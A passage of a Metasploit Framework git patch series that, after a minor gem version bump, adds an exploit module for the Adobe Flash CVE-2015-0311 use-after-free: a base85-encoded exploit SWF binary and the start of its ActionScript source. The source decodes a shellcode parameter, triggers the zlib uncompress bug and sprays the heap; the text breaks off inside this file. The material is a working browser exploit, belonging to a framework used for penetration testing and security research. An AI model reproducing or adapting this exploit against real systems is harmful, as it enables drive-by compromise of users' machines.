From 4ca8611d946afbec0d4a9fd23a1f0511e8889bde Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 9 Mar 2015 11:31:02 -0500 Subject: [PATCH 01/18] latest credential for postgres hash import/export latest version of metasploit-credential updates credential import-export to support the PostgresMD5 hash type MSP-12266 --- metasploit-framework-db.gemspec | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec index 1ce2b27901..7ffe9857f6 100644 --- a/metasploit-framework-db.gemspec +++ b/metasploit-framework-db.gemspec @@ -29,7 +29,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'activerecord', *Metasploit::Framework::RailsVersionConstraint::RAILS_VERSION # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.2' + spec.add_runtime_dependency 'metasploit-credential', '~> 0.14.3' # Database models shared between framework and Pro. spec.add_runtime_dependency 'metasploit_data_models', '~> 0.23.0' # depend on metasploit-framewrok as the optional gems are useless with the actual code From cb72b2687429ec10cfd75435fd442bb866f0ef4e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Mar 2015 16:52:23 -0500 Subject: [PATCH 02/18] Add module for CVE-2014-0311 --- data/exploits/CVE-2015-0311/msf.swf | Bin 0 -> 17656 bytes .../source/exploits/CVE-2015-0311/Main.as | 243 ++++++++++++++++++ .../adobe_flash_uncompress_zlib_uaf.rb | 107 ++++++++ 3 files changed, 350 insertions(+) create mode 100755 data/exploits/CVE-2015-0311/msf.swf create mode 100755 external/source/exploits/CVE-2015-0311/Main.as create mode 100644 modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb 
diff --git a/data/exploits/CVE-2015-0311/msf.swf b/data/exploits/CVE-2015-0311/msf.swf new file mode 100755 index 0000000000000000000000000000000000000000..badd95d11b488e604312bfdf0db008722571bc58 GIT binary patch literal 17656 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/framework/libs) to the AIRSDK folder (/framework/libs) +// 5. 
Build with: mxmlc -o msf.swf Main.as + +// Original code by @hdarwin89 // http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/ +// Modified to be used from msf +package +{ + import flash.display.Sprite; + import flash.display.LoaderInfo; + import flash.system.ApplicationDomain; + import flash.utils.ByteArray; + import avm2.intrinsics.memory.casi32; + import flash.external.ExternalInterface; + import mx.utils.Base64Decoder; + + public class Main extends Sprite + { + private var data:uint = 0xdeaddead + private var uv:Vector. = new Vector. + private var ba:ByteArray = new ByteArray() + private var spray:Vector. = new Vector.(51200) + private var b64:Base64Decoder = new Base64Decoder(); + private var payload:String = ""; + + /*public static function log(msg:String):void{ + var str:String = ""; + str += msg; + + trace(str); + + if(ExternalInterface.available){ + ExternalInterface.call("alert", str); + } + }*/ + + public function Main() + { + b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + payload = b64.toByteArray().toString(); + + for (var i:uint = 0; i < 1000; i++) ba.writeUnsignedInt(data++) + ba.compress() + ApplicationDomain.currentDomain.domainMemory = ba + ba.position = 0x200 + for (i = 0; i < ba.length - ba.position; i++) ba.writeByte(00) + try { + ba.uncompress() + } catch (e:Error) { } + uv[0] = new Vector.(0x3E0) + casi32(0, 0x3e0, 0xffffffff) + + for (i = 0; i < spray.length; i++) { + spray[i] = new Vector.(1014) + spray[i][0] = ba + spray[i][1] = this + } + + /* + 0:008> 